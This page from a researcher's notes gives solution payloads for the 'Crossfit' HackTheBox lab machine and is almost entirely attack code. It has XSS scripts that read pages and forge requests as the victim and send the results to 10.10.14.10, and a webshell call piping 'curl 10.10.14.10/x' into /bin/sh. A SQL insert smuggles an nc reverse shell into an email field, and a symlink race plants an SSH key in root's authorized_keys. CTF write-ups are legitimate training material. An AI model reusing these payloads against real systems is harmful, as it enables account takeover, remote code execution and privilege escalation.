xct's notes
Search…
Introduction
Red Team
Active Directory
Host Enum
Payloads
Passwords
Privilege Escalation
Evasion & Bypasses
Concepts & Research
Binary Exploitation
Web
Cloud
Mobile
Hardware
Crypto
Templates
Misc
Blue Team
Active Directory
Malware Analysis
SIEM
Misc
Labs
Keys & Signing
Language & Framwork Specifics
Misc
HackTheBox
Crossfit
Luanne
APT
Attended
Delivery
Cereal
Powered By
GitBook
Crossfit
Notes for https://youtu.be/jSYRyhY9JuE
User
Payload.js (browse to page & retrieve contents)
1
xhr
=
new
XMLHttpRequest
();
2
​
3
xhr
.
onload
=
function
()
{
4
x
=
new
XMLHttpRequest
();
5
x
.
open
(
"GET"
,
'http://10.10.14.10/?'
+
xhr
.
response
);
6
x
.
send
(
null
);
7
}
8
​
9
xhr
.
open
(
"GET"
,
'http://ftp.crossfit.htb/accounts/create'
,
false
);
10
xhr
.
send
(
null
);
Copied!
Register.js (send POST request as victim)
1
user
=
'foo'
2
pass
=
'foo'
3
​
4
xhr
=
new
XMLHttpRequest
;
5
xhr
.
withCredentials
=
true
;
6
​
7
xhr
.
onload
=
function
()
{
8
x
=
new
XMLHttpRequest
();
9
x
.
open
(
"GET"
,
'http://10.10.14.10/?'
+
xhr
.
response
);
10
x
.
send
(
null
);
11
}
12
xhr
.
open
(
'GET'
,
'http://ftp.crossfit.htb/accounts/create'
,
false
);
13
xhr
.
send
(
null
);
14
​
15
r
=
/
token" value="(.*)"
/
g
;
16
token
=
r
.
exec
(
xhr
.
responseText
)[
1
];
17
​
18
var
params
=
'_token='
+
token
+
'&username='
+
user
+
'&pass='
+
pass
19
xhr
.
open
(
'POST'
,
"http://ftp.crossfit.htb/accounts"
,
false
);
20
xhr
.
setRequestHeader
(
'Content-type'
,
'application/x-www-form-urlencoded'
);
21
xhr
.
send
(
params
);
Copied!
Shell.js (execute webshell command via XSS)
1
xhr
=
new
XMLHttpRequest
();
2
​
3
xhr
.
onload
=
function
()
{
4
x
=
new
XMLHttpRequest
();
5
x
.
open
(
"GET"
,
'http://10.10.14.10/?'
+
xhr
.
response
);
6
x
.
send
(
null
);
7
}
8
​
9
xhr
.
open
(
"GET"
,
'http://development-test.crossfit.htb/xct.php?xcmd=curl 10.10.14.10/x|/bin/sh'
,
false
);
10
xhr
.
send
(
null
);
Copied!
Root
Guess.c
1
int
main
(
void
){
2
srand
(
time
(
0
));
3
printf
(
"%d"
,
rand
());
4
return
0
;
5
}
Copied!
Become ftpadm
1
su
-s /bin/bash -c
'echo 123>/srv/ftp/messages/123'
ftpadm
Copied!
1
insert into users (id,email) VALUES (0,'
[email protected]
--wrong-argument || nc.traditional 10.10.14.10 1337 -e /bin/sh');
Copied!
Race to Root (as hank)
1
while
true
;
do
ln
-s /root/.ssh/authorized_keys /var/local/
$(
echo
-ne
$(
./guess
)
1000
|
md5sum
|
awk
'{ print $1 }'
)
2
>
/dev/null
;
done
Copied!
1
insert into messages (id, name, email, message) VALUES (1000, 'ssh-ed25519', '
[email protected]
', 'AAAAC3NzaC1lZDI1NTE5AAAAINvEpPGmpbIYTXl69lGbFlPa137agV6rvHGq5PgU5vsF');
Copied!
Misc - Previous
Misc
Next - HackTheBox
Luanne
Last modified
1yr ago
Copy link
Contents
User
Payload.js (browse to page & retrieve contents)
Register.js (send POST request as victim)
Shell.js (execute webshell command via XSS)
Root
Guess.c
Become ftpadm
Race to Root (as hank)